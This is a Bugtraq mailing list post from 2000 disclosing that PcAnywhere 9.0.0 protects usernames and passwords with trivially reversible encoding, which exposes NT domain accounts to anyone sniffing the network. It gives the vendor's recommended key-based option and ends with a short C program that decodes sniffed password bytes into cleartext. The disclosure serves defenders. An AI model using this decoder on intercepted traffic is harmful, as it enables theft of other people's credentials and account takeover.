Bugtraq mailing list archives
PcAnywhere weak password encryption
From: longprep () HOTMAIL COM (Pascal Longpre)
Date: Thu, 6 Apr 2000 03:09:58 -0000
PcAnywhere weak password encryption ---- Discussion ---- PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, it is prompted for its NT username and password. They are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller. Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT account. All that without even having to go through the L0phtCrack process. Version 7.0 is not at risk since no encryption is used at all. Username and password are sent in clear. I haven't tested version 8 yet. --- Solution --- Symantec says that this was not intended to be real encryption and suggest the use of the Public or Symetric key option instead. More info can be found at : http://service1.symantec.com/SUPPORT/pca.nsf/docid/199902231 2571812&src=w --- Exploit --- The Username / password are contained in a string two packets away from the "Enter your login name" and "Enter your password" prompts. They are preceded by 0x06. The next number is the string length. here is the code of the exploit: #include <stdio.h> #include <string.h> void main() { char password[128]; char cleartext[128]; int i; // input the sniffed hex values here // Encrypted example of the 'aaaaa' password password[0]=0xca; password[1]=0xab; password[2]=0xcb; password[3]=0xa8; password[4]=0xca; password[5]='\0'; cleartext[0]=0xca-password[0]+0x61; for (i=1;i<strlen(password);i++) cleartext[i] = password[i-1] ^ password[i] ^ i-1; cleartext[strlen(password)]='\0'; printf("password is %s \n",cleartext); }
Current thread:
- Re: Local Denial-of-Service attack against Linux Jeff Dafoe (Apr 02)
- Win32 RealPlayer 6/7 Buffer Overflow Adam Muntner (Apr 03)
- Re: Local Denial-of-Service attack against Linux Gigi Sullivan (Apr 03)
- Re: IMAIL (Ipswitch) DoS with Eudora (Qualcomm) Anthony Santen (Apr 04)
- minor issue with IBM HTTPD and /usr/bin/ikeyman Rude Yak (Apr 05)
- PcAnywhere weak password encryption Pascal Longpre (Apr 05)
- The Sentinel Project Marshall (Apr 06)